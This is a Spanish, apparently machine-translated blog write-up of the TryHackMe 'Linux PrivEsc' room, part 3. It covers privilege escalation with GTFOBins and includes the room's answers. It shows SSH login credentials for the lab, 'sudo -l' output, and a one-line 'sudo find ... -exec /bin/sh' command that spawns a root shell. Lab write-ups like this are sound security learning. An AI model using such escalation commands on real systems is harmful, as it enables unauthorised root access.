[Tryhackme] Mejora del privilegio usando gtfobins! Linux Privesc Escritura Parte 3

[Tryhackme] Mejora del privilegio usando gtfobins! Linux Privesc WRITEPU PARTE 3

Esta vez, intentaremos escalar privilegios usando "GTFOBins".
Para la máquina de destino, usaremos la siguiente sala TryHackMe:
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "


Este artículo es la Parte 3.
Si desea consultar el informe sobre PrivEsc en Linux con TryHackMe, consulte también Escalada de privilegios mediante permisos de archivos débiles en Linux

Tenga en cuenta que la explicación es spoilers.

Tabla de contenido

Preparación

Iniciar la máquina de destino

Primero, inicie la máquina de destino.
Únase a "Tryhackme-Linux PrivSc: https://tryhackme.com/room/linuxprivesc

Si la dirección IP se muestra así, el arranque está bien.

Conexión ssh

Conéctese a la máquina de destino que comenzó a usar SSH.
Como se explicó, está bien siempre que pueda conectarse usando "Usuario: contraseña321".

└─ $ ssh user@10.10.6.35 La autenticidad del host '10 .10.6.35 (10.10.6.35) 'no se puede establecer. DSA Key Fingerprint es SHA256: P2NSSFVYJVK1QE0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Esta clave no se sabe por otros nombres, ¿está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.6.35 '(DSA) a la lista de hosts conocidos. User@10.10.6.35's contraseña: Linux Debian 2.6.32-5-amd64 #1 SMP martes 13 de mayo 16:34:35 UTC 2014 x86_64 Los programas incluidos con el sistema GNU/Linux Debian son software gratuito; Los términos de distribución exactos para cada programa se describen en los archivos individuales en/usr/share/doc/*/copyright. Debian GNU/Linux no tiene absolutamente ninguna garantía, en la medida permitida por la ley aplicable. Último inicio de sesión: viernes 15 de mayo 06:41:23 2020 desde 192.168.1.125 Usuario@Debian: ~ $ sudo -l Entradas predeterminadas de coincidencia para el usuario en este host: env_reset, env_keep+= ld_preload, env_ senck+= ld_library_path

Es posible que necesite agregar "-oHostKeyAlgorithms=+ssh-rsa"

Escalada de privilegios mediante GTFOBins

Ahora intentemos la escalada de privilegios usando GTFOBins

¿Cuántos programas puede ejecutar el “usuario” a través de sudo?

Primero, obtengamos los programas que el usuario puede ejecutar con sodo.
El comando es "sodo -l".

Usuario@Debian: ~ $ sudo -l Entradas de default de coincidencia para el usuario en este host: Env_Reset, Env_Keep+= LD_PReload, Env_Keep+= LD_Library_Path User User puede ejecutar los siguientes comandos en este host: (root) Nopasswd:/usr/sbin/iftop (root) nopasswd:/usr/bin/find (root (root) no /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/bin/man (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/menos (root) nopasswd:/usr/bin/ftp (root) nopasswd: nMaP/bin/bin) (root) nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/más

Resulta que los 11 programas anteriores se pueden ejecutar con sodo

Un programa de la lista no tiene una secuencia de escape de shell en GTFOBins. ¿Cuál es?

A continuación, busque programas que no tengan una secuencia de escape de shell.
(De hecho, debería buscar programas que sí la tengan).

Cuando los busqué uno por uno, sólo faltaba "apache2"

La respuesta es "apache2"

Intente aumentar los privilegios usando GTFOBins

Ahora, intentemos elevar los privilegios.
Debería ser posible hacerlo con cualquiera de los comandos mencionados, excepto con "apache2". Esta vez, lo intentaremos con "find".

Primero, busquemos Sodo usando buscar

Parece que es solo cuestión de ejecutar el comando, así que intentaré ejecutarlo para implementarlo.

usuario@debian:~$ sudo find . -exec /bin/sh \; -quit sh-4.1# quién soy root

Pude confirmar que sí pude elevar mis privilegios a root.
Es muy sencillo... ¿De verdad es así de fácil?

resumen

Esta vez, intenté escalar privilegios usando "GTFOBins".
Fue un poco decepcionante lo fácil que fue escalarlos, pero parece que podría ser útil.

Referencias y sitios

Medio ( Shamsher khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5

¡Comparte si quieres!

Quien escribió este artículo

Este es un blog que comencé a estudiar la seguridad de la información. Como nuevo empleado, sería feliz si pudieras mirar con un corazón amplio.
También está Teech Lab, que es una oportunidad para estudiar diversión de programación, por lo que si está interesado en el desarrollo de software, ¡asegúrese de echar un vistazo!

Tabla de contenido